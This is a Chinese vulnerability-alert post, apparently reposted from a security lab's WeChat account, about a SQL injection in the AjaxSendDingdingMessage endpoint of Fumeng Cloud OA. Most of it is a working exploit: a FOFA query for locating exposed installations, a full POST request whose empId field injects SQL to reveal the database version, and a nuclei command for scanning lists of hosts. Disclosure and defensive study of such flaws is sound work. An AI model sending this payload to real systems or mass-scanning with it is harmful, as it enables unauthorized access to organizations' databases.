0x02 漏洞描述
孚盟云oa ajaxsenddingdingmessage 存在sql注入漏洞。
0x03 漏洞复现
fofa-query: body="hidLicResult" && body="hidProductID"
1.执行poc进行数据库版本查询,得到结果
POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51
action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t fumengyun-oa-ajaxsenddingdingmessage-sqli.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞预警 孚盟云oa ajaxsenddingdingmessage sql注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论